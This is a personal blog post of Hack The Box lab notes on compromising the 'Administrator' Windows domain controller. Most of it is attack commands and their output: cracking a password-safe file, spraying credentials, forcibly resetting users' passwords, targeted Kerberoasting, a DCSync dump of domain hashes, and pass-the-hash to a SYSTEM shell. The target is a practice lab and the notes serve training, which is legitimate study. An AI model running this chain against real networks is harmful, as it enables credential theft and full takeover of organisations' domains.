chidunguyen.com

Administrator-HTB Notes

Administrator-HTB

Written by

Du

in

Here is my notes on Administrator box from Hackthebox.

“`

Administrator: 10.129.113.255

#As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd

crackmapexec ftp 10.129.113.255 -u Benjamin -p Password123
FTP 10.129.113.255 21 10.129.113.255 [*] Banner: Microsoft FTP Service
FTP 10.129.113.255 21 10.129.113.255 [+] Benjamin:[REDACTED]

#FROM BLOODHOUND DATA ATTACK.

┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# ftp 10.129.113.255
Connected to 10.129.113.255.
220 Microsoft FTP Service
Name (10.129.113.255:kali): Benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||52548|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************| 952 24.23 KiB/s 00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (23.48 KiB/s)
ftp> exit
221 Goodbye.

┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# ls
Backup.psafe3

hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

Backup.psafe3:[REDACTED]

python2.7 /home/kali/CPTS-EXAM/results/AD/WS01/psafe3-to-keepass-csv/psafe3-to-keepass-csv.py ./Backup.psafe3 ./exported.csv

┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# cat exported.csv
group,title,username,password,url,notes,modified
,Alexander Smith,alexander,Urk[REDACTED],,,1969-12-31T19:00:00
,Emma Johnson,emma,WwANQW[REDACTED],,,1969-12-31T19:00:00
,Emily Rodriguez,emily,UXL[REDACTED],,,1969-12-31T19:00:00

alexander:UrkIba[REDACTED]
emma:WwANQWnm[REDACTED]
emily:UXLCI5[REDACTED]

┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# cat users.txt
alexander
emma
emily


┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# cat pass.txt
UrkIbago[REDACTED]
WwANQ[REDACTED]
UXLCI5[REDACTED]


┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# crackmapexec smb 10.129.113.255 -u users.txt -p pass.txt –no-bruteforce –continue-on-success
SMB 10.129.113.255 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.113.255 445 DC [-] administrator.htb\alexander:UrkIba[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.113.255 445 DC [-] administrator.htb\emma:WwANQWnm[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.113.255 445 DC [+] administrator.htb\emily:UXLCI[REDACTED]


crackmapexec winrm 10.129.113.255 -u users.txt -p pass.txt –no-bruteforce –continue-on-success
SMB 10.129.113.255 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.129.113.255 5985 DC [*] http://10.129.113.255:5985/wsman
WINRM 10.129.113.255 5985 DC [-] administrator.htb\alexander:UrkIbago[REDACTED]
WINRM 10.129.113.255 5985 DC [-] administrator.htb\emma:WwANQWnm[REDACTED]
WINRM 10.129.113.255 5985 DC [+] administrator.htb\emily:UXLCI5iE[REDACTED] (Pwn3d!)



53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-29 03:06:38Z)

GetUserSPNs.py -request -dc-ip 10.129.113.255 administrator.htb/Olivia:ichliebedich
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__(‘pkg_resources’).run_script(‘impacket==0.9.24.dev1+20210704.162046.29ad5792’, ‘GetUserSPNs.py’)
Impacket v0.9.24.dev1+20210704.162046.29ad5792 – Copyright 2021 SecureAuth Corporation

No entries found!

#NO Kerberoasting.

#NO Asreproasting.

bloodhound-python -c All -u Olivia -p ‘ichliebedich’ -d administrator.htb –dns-tcp -ns 10.129.113.255

BloodHound DATA:

Olivia -> GenericAll -> Michael:

net rpc password “Michael” “[REDACTED]” -U “administrator.htb”/”Olivia”%”ichliebedich” -S 10.129.113.255

crackmapexec smb 10.129.113.255 -u Michael -p Password123
SMB 10.129.113.255 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.113.255 445 DC [+] administrator.htb\Michael:[REDACTED]


Michael -> ForceChangePassword -> Benjamin -> Member of -> Share Moderators Group:

net rpc password “Benjamin” “[REDACTED]” -U “administrator.htb”/”Michael”%”[REDACTED]” -S 10.129.113.255

crackmapexec smb 10.129.113.255 -u Benjamin -p [REDACTED]
SMB 10.129.113.255 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.113.255 445 DC [+] administrator.htb\Benjamin:[REDACTED]


Emily -> GenericWrite -> Ethan -> Member of -> Domain Admin Group:

python3 targetedKerberoast.py -v -d ‘administrator.htb’ -u ’emily’ -p ‘[REDACTED]’

sudo rdate -n 10.129.113.255

. .\PowerView.ps1

$SecPassword = ConvertTo-SecureString ‘UXLC[REDACTED]’ -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential(‘administrator.htb\emily’, $SecPassword)

Set-DomainObject -Identity ethan -SET @{serviceprincipalname=’nonexistent/BLAHBLAH’}

Get-DomainSPNTicket -Credential $Cred nonexistent/BLAHBLAH

john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
[REDACTED] (?)
1g 0:00:00:00 DONE (2024-11-28 16:30) 11.11g/s 56888p/s 56888c/s 56888C/s newzealand..babygrl
Use the “–show” option to display all of the cracked passwords reliably
Session completed.

ethan:[REDACTED]

#Now doing dcsync attacks.

sudo secretsdump.py -just-dc ethan:[REDACTED]@10.129.113.255

sudo secretsdump.py -just-dc ethan:[REDACTED]@10.129.113.255

/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__(‘pkg_resources’).run_script(‘impacket==0.9.24.dev1+20210704.162046.29ad5792’, ‘secretsdump.py’)
Impacket v0.9.24.dev1+20210704.162046.29ad5792 – Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[REDACTED]

#Administrator HASH OBTAINED !


135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)

ldapsearch -H ldap://10.129.113.255 -x -W -D “Olivia@administrator.htb” -b “dc=administrator,dc=htb” ‘(objectClass=person)’ > ldap-people

Olivia is remote-management user.

445/tcp open microsoft-ds?

┌──(root㉿kali)-[/home/kali/HTB/10.129.113.255]
└─# smbclient -N -L 10.129.113.255 -U “Guest”
session setup failed: NT_STATUS_LOGON_FAILURE

┌──(root㉿kali)-[/home/kali/HTB/10.129.113.255]
└─# smbclient -N -L 10.129.113.255 -U “”

Sharename Type Comment
——— —- ——-
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.113.255 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 — no workgroup available

#NO SYSVOL xml or gpp scripts = DON’T BOTHER !



464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.

crackmapexec winrm 10.129.113.255 -u Olivia -p ‘ichliebedich’
SMB 10.129.113.255 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.129.113.255 5985 DC [*] http://10.129.113.255:5985/wsman
WINRM 10.129.113.255 5985 DC [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)


evil-winrm -i 10.129.113.255 -u Olivia -p ‘ichliebedich’

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami
administrator\olivia
*Evil-WinRM* PS C:\Users\olivia\Documents> hostname
dc

OLIVIA SHELL ! but no flag though.

adPEAS:

[*] +++++ Checking DCSync Rights +++++
[*] https://book.hacktricks.xyz/windows/active-directory-methodology/dcsync
Checking DCSync Rights – Details for Domain ‘administrator.htb’:
ActiveDirectoryRight : DS-Replication-Get-Changes
Identity : ADMINISTRATOR\ethan
distinguishedName : CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
ObjectSID : S-1-5-21-1088858960-373806567-254189436-1113

ActiveDirectoryRight : DS-Replication-Get-Changes-In-Filtered-Set
Identity : ADMINISTRATOR\ethan
distinguishedName : CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
ObjectSID : S-1-5-21-1088858960-373806567-254189436-1113

ActiveDirectoryRight : DS-Replication-Get-Changes-All
Identity : ADMINISTRATOR\ethan
distinguishedName : CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
ObjectSID : S-1-5-21-1088858960-373806567-254189436-1113


#ethan is a very interesting man or woman.

Import-Module .\PowerView.ps1
$sid = Convert-NameToSid Benjamin

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

Get-NetUser -Identity benjamin -domain administrator.htb

Get-ObjectAcl -Domain administrator.htb | Where-Object {$_.SecurityIdentifier -eq ‘S-1-5-21-1088858960-373806567-254189436-1110’}

olivia -> emily:

#FROM BLOODHOUND DATA ATTACK and FTP.

crackmapexec winrm 10.129.113.255 -u users.txt -p pass.txt –no-bruteforce –continue-on-success
SMB 10.129.113.255 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.129.113.255 5985 DC [*] http://10.129.113.255:5985/wsman

WINRM 10.129.113.255 5985 DC [+] administrator.htb\emily:UXLC[REDACTED] (Pwn3d!)

evil-winrm -i 10.129.113.255 -u emily -p ‘UXLC[REDACTED]’

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Documents> hostname
dc

EMILY SHELL !

*Evil-WinRM* PS C:\Users\emily\Desktop> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\emily\Desktop> dir


Directory: C:\Users\emily\Desktop


Mode LastWriteTime Length Name
—- ————- —— —-
-a—- 10/30/2024 2:23 PM 2308 Microsoft Edge.lnk
-ar— 11/28/2024 6:58 PM 34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
[REDACTED]


USER.TXT: [REDACTED]

PRIV ESC:

#FROM BLOODHOUND DATA ATTACK: emily -> ethan

sudo secretsdump.py -just-dc ethan:[REDACTED]@10.129.113.255

/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__(‘pkg_resources’).run_script(‘impacket==0.9.24.dev1+20210704.162046.29ad5792’, ‘secretsdump.py’)
Impacket v0.9.24.dev1+20210704.162046.29ad5792 – Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[REDACTED]

#Administrator HASH OBTAINED !

psexec.py -hashes :3dc5[REDACTED] Administrator@10.129.113.255
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__(‘pkg_resources’).run_script(‘impacket==0.9.24.dev1+20210704.162046.29ad5792’, ‘psexec.py’)
Impacket v0.9.24.dev1+20210704.162046.29ad5792 – Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.129.113.255…..
[*] Found writable share ADMIN$
[*] Uploading file ZJjIDGDF.exe
[*] Opening SVCManager on 10.129.113.255…..
[*] Creating service IOOe on 10.129.113.255…..
[*] Starting service IOOe…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
dc

SYSTEM-SHELL !

C:\Users\Administrator\Desktop>whoami
nt authority\system

C:\Users\Administrator\Desktop>hostname
dc

C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 6131-DE70

Directory of C:\Users\Administrator\Desktop

11/01/2024 01:47 PM <DIR> .
10/22/2024 10:46 AM <DIR> ..
11/28/2024 06:58 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,385,117,696 bytes free

C:\Users\Administrator\Desktoptype root.txt
[REDACTED]

ROOT.TXT: [REDACTED]










9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51449/tcp open msrpc Microsoft Windows RPC
64285/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64290/tcp open msrpc Microsoft Windows RPC
64301/tcp open msrpc Microsoft Windows RPC
64315/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

“`

Thanks you for reading my note !

More posts